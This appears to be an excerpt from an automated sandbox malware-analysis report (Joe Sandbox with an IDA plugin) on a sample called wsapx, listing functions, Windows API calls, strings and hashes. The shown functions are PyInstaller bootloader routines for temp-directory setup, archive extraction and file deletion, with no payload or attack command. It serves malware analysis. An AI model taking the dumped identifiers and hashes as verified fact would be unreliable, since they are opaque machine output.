MEI, xrefs: 00007FF7C71B3933
Could not create temporary directory!, xrefs: 00007FF7C71B3CBF
pyi-python-flag, xrefs: 00007FF7C71B3AD6
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF7C71B3D35
pyi-contents-directory, xrefs: 00007FF7C71B3B8D
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7C71B3C61
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF7C71B3E0A
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF7C71B3B32
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF7C71B3882, 00007FF7C71B38AF
Failed to load splash screen resources!, xrefs: 00007FF7C71B3E85
pkg, xrefs: 00007FF7C71B39BE
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF7C71B3A0B, 00007FF7C71B3CD4, 00007FF7C71B3F6B
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7C71B3EA6
bye-runtime-tmpdir, xrefs: 00007FF7C71B3B68
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7C71B3971
Failed to remove temporary directory: %s, xrefs: 00007FF7C71B3FC3
Failed to start splash screen!, xrefs: 00007FF7C71B3ED4
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7C71B39DE
VCRUNTIME140.dll, xrefs: 00007FF7C71B3DB1
Failed to convert DLL search path!, xrefs: 00007FF7C71B3DDC
pyi-disable-windowed-traceback, xrefs: 00007FF7C71B3BB2
_PYI_ARCHIVE_FILE, xrefs: 00007FF7C71B38D2, 00007FF7C71B39FF
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7C71B3EBB
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7C71B3BE8
_PYI_SPLASH_IPC, xrefs: 00007FF7C71B3A23, 00007FF7C71B3EF5
Py_GIL_DISABLED, xrefs: 00007FF7C71B3AF4

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 2a96b31381e5ad76f6c9c800fc25db96848fede942b56e2c9c68fa3cb0d42264
Instruction ID: 8a0433d2a297f1ae2080a340be932a6bcead0bd754eeb409eb830f4b06b84214
Opcode Fuzzy Hash: 2a96b31381e5ad76f6c9c800fc25db96848fede942b56e2c9c68fa3cb0d42264
Instruction Fuzzy Hash: FC329FA1A0868293FB25BF25B4552B9E651EFD4FA0FC44432DE5D432C6DF2CE56AC320

Function 00007FF7C71D69D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C71D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D6749
Part of subcall function 00007FF7C71D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D67C7
Part of subcall function 00007FF7C71D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D6818

CreateFileW.KERNELBASE ref: 00007FF7C71D6ADA
CreateFileW.KERNEL32 ref: 00007FF7C71D6B2A
GetLastError.KERNEL32 ref: 00007FF7C71D6B5A
GetFileType.KERNELBASE ref: 00007FF7C71D6B6F
GetLastError.KERNEL32 ref: 00007FF7C71D6B79
CloseHandle.KERNEL32 ref: 00007FF7C71D6BAC
CloseHandle.KERNEL32 ref: 00007FF7C71D6D0F
CreateFileW.KERNEL32 ref: 00007FF7C71D6D44
GetLastError.KERNEL32 ref: 00007FF7C71D6D53

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 8f976919f97738e0c6914738063a1009788b273b3c4705686e7d387d067904c9
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 09C1D332B28A4186EB11EFA9E4902AC7771F799FA8B414225DE2E577D4CF38E512C710

Function 00007FF7C71B83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B841B
RemoveDirectoryW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B849E
DeleteFileW.KERNELBASE(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84BD
FindNextFileW.KERNELBASE(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84CB
FindClose.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84DC
RemoveDirectoryW.KERNELBASE(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84E5

Strings

%s\*, xrefs: 00007FF7C71B83E2

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 03cd2494af196f309b8c586f0a0ecbf1177fb2e78981d939d22f52a89805784c
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 69413071A0C54286EB20BF15F4886B9A3A1FBD4F64FC00636D99E42694DE3CD54B8B60

Function 00007FF7C71B92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7C71B9323
FindClose.KERNELBASE ref: 00007FF7C71B9332

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: ee5f7b41a779f1b103c57a755e9006fa80703bf78b4dcbba2fcb032095924202
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 16F04472A18641C7F760AF64B49976AA750ABC4B74F844335D96D026D4DF3CD14E8A10

Function 00007FF7C71D0938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction ID: c5ece680f8aeb8dbd291738ef76595484f547bc70dbaca88fd315c87f5525176
Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction Fuzzy Hash: 5802CC21A1D65247FA66BF11B885279A680AFD5FB0FD98234DE5D473D2DE3CE8038720

Function 00007FF7C71B1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C71B7F80: _fread_nolock.LIBCMT ref: 00007FF7C71B802A

_fread_nolock.LIBCMT ref: 00007FF7C71B1A1B

Part of subcall function 00007FF7C71B2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C71B1B6A), ref: 00007FF7C71B295E

Strings

Could not allocate memory for archive structure!, xrefs: 00007FF7C71B1A61
Could not read full TOC!, xrefs: 00007FF7C71B1B55
calloc, xrefs: 00007FF7C71B1A68
Could not allocate buffer for TOC!, xrefs: 00007FF7C71B1B1B
malloc, xrefs: 00007FF7C71B1B22
Failed to seek to cookie position!, xrefs: 00007FF7C71B19EE
MEI, xrefs: 00007FF7C71B1991
Failed to read cookie!, xrefs: 00007FF7C71B1A2B
fread, xrefs: 00007FF7C71B1A32, 00007FF7C71B1B5C
Error on file., xrefs: 00007FF7C71B1B8D
fseek, xrefs: 00007FF7C71B19F5

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 58225087cf25093a45ac815a211ae9755d004a3b08d95a3dd9be452e4c7b7362
Instruction ID: d70cfc6195fc226bdad842685ad331c19464c239623485a34b7d0e1af4d7eff2
Opcode Fuzzy Hash: 58225087cf25093a45ac815a211ae9755d004a3b08d95a3dd9be452e4c7b7362
Instruction Fuzzy Hash: E68184B1A0868687E721EF25F0812B9A3A0EFC4FA4F814435DD4E47785DE3CE6479B60

Function 00007FF7C71B1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF7C71B1749
fwrite, xrefs: 00007FF7C71B17D1
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7C71B1742
fread, xrefs: 00007FF7C71B17E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7C71B17DF
Failed to extract %s: failed to open target file!, xrefs: 00007FF7C71B165C
Failed to create symbolic link %s!, xrefs: 00007FF7C71B1622
fopen, xrefs: 00007FF7C71B1663
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7C71B16A2
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7C71B17CA
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7C71B16DA
fseek, xrefs: 00007FF7C71B16E1

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 286e7e8ec595517422b4fb4c3c5380d832a73e8b29d434e71ef21d1d453d8d85
Instruction ID: e7174c52c80f606bb8701608f639d02b6bed5967f7e507e743bba792b976bae3
Opcode Fuzzy Hash: 286e7e8ec595517422b4fb4c3c5380d832a73e8b29d434e71ef21d1d453d8d85
Instruction Fuzzy Hash: E051BCA1B0864393EA20BF62B4411A9A3A1BFC4FB4FC04135EE1D47796DE3CE6579760

Function 00007FF7C71B8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B88F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B88FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B893C

Part of subcall function 00007FF7C71B8A20: GetEnvironmentVariableW.KERNEL32(00007FF7C71B388E), ref: 00007FF7C71B8A57
Part of subcall function 00007FF7C71B8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C71B8A79

Part of subcall function 00007FF7C71C82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C82C1

Part of subcall function 00007FF7C71B2810: MessageBoxW.USER32 ref: 00007FF7C71B28EA

Strings

LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF7C71B896E
_MEI%d, xrefs: 00007FF7C71B8902
TMP, xrefs: 00007FF7C71B888C, 00007FF7C71B8993
LOADER: failed to set the TMP environment variable., xrefs: 00007FF7C71B88CC
TMP, xrefs: 00007FF7C71B88B2

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction ID: ec5bfb5899b85b3e7ad5484b1e45a380087749ebb51df6dd078f1317718654c1
Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction Fuzzy Hash: BE41B261A1964243FA11BF66B8962F992A0AFC9FA0FC04031DD0D4779ADE3CE5078760

Function 00007FF7C71B1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7C71B141E
malloc, xrefs: 00007FF7C71B12C1, 00007FF7C71B12F6
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7C71B12BA
1.3.1, xrefs: 00007FF7C71B1249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7C71B12EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7C71B1276

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 3c9a59ff3bb3cad3576c5a79fada2bf92f4883a0976c2eb1c2674206ff102632
Instruction ID: f0ddfb54fb9ec7ee14178d4a41ba3103b588aca2adbbb5e5cdd1bef71c2110f3
Opcode Fuzzy Hash: 3c9a59ff3bb3cad3576c5a79fada2bf92f4883a0976c2eb1c2674206ff102632
Instruction Fuzzy Hash: 9951BB62A0864287EA60BF56B4403BAA691ABC5FB4FC44135ED4E47BD5EF3CE5078720

Function 00007FF7C71CED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7C71CF11A,?,?,-00000018,00007FF7C71CADC3,?,?,?,00007FF7C71CACBA,?,?,?,00007FF7C71C5FAE), ref: 00007FF7C71CEEFC
GetProcAddress.KERNEL32(?,?,?,00007FF7C71CF11A,?,?,-00000018,00007FF7C71CADC3,?,?,?,00007FF7C71CACBA,?,?,?,00007FF7C71C5FAE), ref: 00007FF7C71CEF08

Strings

api-ms-, xrefs: 00007FF7C71CEE46
ext-ms-, xrefs: 00007FF7C71CEE59

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 4f0361497c197a877d9f78481c4e2f4a0ae586d01af83d02d19e700cfb4477c8
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 6B41E321B1960243FA16EF56B804575A399BF88FF0FD84539DD1D57784EE3CE50A8320

Function 00007FF7C71B36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7C71B3804), ref: 00007FF7C71B36E1
GetLastError.KERNEL32(?,00007FF7C71B3804), ref: 00007FF7C71B36EB

Part of subcall function 00007FF7C71B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
Part of subcall function 00007FF7C71B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
Part of subcall function 00007FF7C71B2C50: MessageBoxW.USER32 ref: 00007FF7C71B2D99

Strings

\\?\, xrefs: 00007FF7C71B375A
Failed to obtain executable path., xrefs: 00007FF7C71B36F3
Failed to resolve full path to executable %ls., xrefs: 00007FF7C71B3739
Failed to convert executable path to UTF-8., xrefs: 00007FF7C71B3790
GetModuleFileNameW, xrefs: 00007FF7C71B36FA

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: d7c625f00dc0556c782e8169b8c780d09ad15c6b6bcd1706939ef0799a3c3d24
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 292186A1B1854293FA21BF24F8453BAA250BFD9B74FC04131D95D825D5EE2CE507C720

Function 00007FF7C71CBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CBEF9

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction ID: 41f3a82bdc70f6a546d4a16df185e655519058753c3f07397cff2973656d6180
Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction Fuzzy Hash: 27C1C522A0C68643E771AF95A4402BDBB64EBC1FA0FD54131EA4E43795CE7CEA578720

Function 00007FF7C71B8760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7C71B8780
OpenProcessToken.ADVAPI32 ref: 00007FF7C71B8793
GetTokenInformation.KERNELBASE ref: 00007FF7C71B87B8
GetLastError.KERNEL32 ref: 00007FF7C71B87C2
GetTokenInformation.KERNELBASE ref: 00007FF7C71B8802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7C71B881E
CloseHandle.KERNEL32 ref: 00007FF7C71B8836

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
